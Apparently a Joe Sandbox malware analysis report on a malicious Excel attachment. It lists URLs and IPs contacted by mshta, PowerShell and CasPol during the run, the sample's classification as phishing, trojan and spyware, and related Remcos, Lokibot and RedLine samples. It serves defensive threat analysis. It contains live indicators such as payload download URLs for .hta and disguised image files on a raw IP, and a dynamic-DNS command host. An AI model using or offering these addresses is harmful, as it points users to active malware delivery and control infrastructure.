                                                                            unknown
                                                                            http://www.nirsoft.net/CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.426757676.0000000002091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.480727505.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000001F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                unknown
                                                                                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                  unknown
                                                                                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                    unknown
                                                                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                      unknown
                                                                                      https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain-vmshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.imvu.comCasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://contextual.media.net/bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                          unknown
                                                                                          http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                            unknown
                                                                                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv417.tmp.31.drfalse
                                                                                              unknown
                                                                                              http://www.msn.com/bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                unknown
                                                                                                https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainG4mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                    unknown
                                                                                                    https://drive.google.compowershell.exe, 0000000F.00000002.480727505.0000000002552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                        unknown
                                                                                                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                          unknown
                                                                                                          https://policies.yahoo.com/w3c/p3p.xmlbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                            unknown
                                                                                                            http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.msn.com/advertisement.ad.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                              unknown
                                                                                                              http://107.174.146.46/mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://b.scorecardresearch.com/beacon.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                  unknown
                                                                                                                  http://acdn.adnxs.com/ast/ast.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                    unknown
                                                                                                                    http://ocsp.entrust.net03mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://acesso.run/Omshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta.NET4.0C;mshta.exe, 00000004.00000002.412322987.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.412104448.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaC:mshta.exe, 00000004.00000003.409103792.0000000003683000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.0000000003683000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 0000001F.00000002.516164879.000000000216A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.516435437.000000000220A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523035849.0000000002159000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523294829.00000000021FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                              unknown
                                                                                                                              http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                unknown
                                                                                                                                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://go.microspowershell.exe, 00000005.00000002.426757676.0000000002E74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFppowershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://acesso.run/pmshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://contoso.com/powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://drive.usercontent.google.compowershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv417.tmp.31.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://acesso.run/mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://acesso.run/koEmshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainD4mshta.exe, 00000004.00000002.412317283.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://acesso.run/dmshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain~4mshta.exe, 00000004.00000003.406433145.000000000017E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.ccleaner.com/go/app_cc_pro_trialkeybhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://contextual.media.net/8/nrrV73987.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestrainmshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv417.tmp.31.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://acesso.run/)mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFC:powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainImshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htantmshta.exe, 00000004.00000003.409103792.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://www.imvu.com/kCasPol.exe, 0000002A.00000002.502030748.000000000018C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://www.ebuddy.comCasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    172.67.162.95
                                                                                                                                                                                    acesso.runUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    104.21.74.191
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    107.174.146.46
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                                                                                                                    107.175.130.20
                                                                                                                                                                                    seemebest2024rmc.duckdns.orgUnited States
                                                                                                                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                                                                                                                    142.250.184.206
                                                                                                                                                                                    drive.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    172.217.16.193
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    178.237.33.50
                                                                                                                                                                                    geoplugin.netNetherlands
                                                                                                                                                                                    8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                    142.250.185.65
                                                                                                                                                                                    drive.usercontent.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1545826
                                                                                                                                                                                    Start date and time:2024-10-31 05:12:41 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 9m 23s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                    Number of analysed new started processes analysed:52
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:A & C Metrology OC 545714677889Materiale.xls
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.phis.troj.spyw.expl.evad.winXLS@76/50@10/8
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                                                                    • Number of executed functions: 164
                                                                                                                                                                                    • Number of non-executed functions: 320
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                                    • Active ActiveX Object
                                                                                                                                                                                    • Active ActiveX Object
                                                                                                                                                                                    • Active ActiveX Object
                                                                                                                                                                                    • Scroll down
                                                                                                                                                                                    • Close Viewer
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3004 because there are no executed function
                                                                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3720 because there are no executed function
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: A & C Metrology OC 545714677889Materiale.xls
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    00:13:55API Interceptor108x Sleep call for process: mshta.exe modified
                                                                                                                                                                                    00:13:58API Interceptor813x Sleep call for process: powershell.exe modified
                                                                                                                                                                                    00:14:08API Interceptor14x Sleep call for process: wscript.exe modified
                                                                                                                                                                                    00:14:33API Interceptor1491081x Sleep call for process: CasPol.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    172.67.162.95PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                      AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                Order-1351125X.docx.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                  2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                    Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                      Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                        • tuong.me/wp-login.php
                                                                                                                                                                                                        107.175.130.201729663146c8454a6b25503db557ed74c81f42ed9b740436d6e676d350f52fc2b9b887ced4117.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                          ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                            1728239645797292025226e9acb49e89d83573a2cc0d27d167f28d4f30183138d9571f4d7c739.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                              CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  178.237.33.50QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  HSBC Payment Swift Copy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  swithnew.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1730208009cbbc5185357f6c127206378a947c7560ccc5f5234da3819452d576d86ecf0fd2268.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1730205125e17c77fd100fac247e845e0d35eb80fd3ed2b798c588796b720ffad142a2b233827.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  acesso.runPO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  geoplugin.netQUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  HSBC Payment Swift Copy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  swithnew.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1730208009cbbc5185357f6c127206378a947c7560ccc5f5234da3819452d576d86ecf0fd2268.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1730205125e17c77fd100fac247e845e0d35eb80fd3ed2b798c588796b720ffad142a2b233827.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
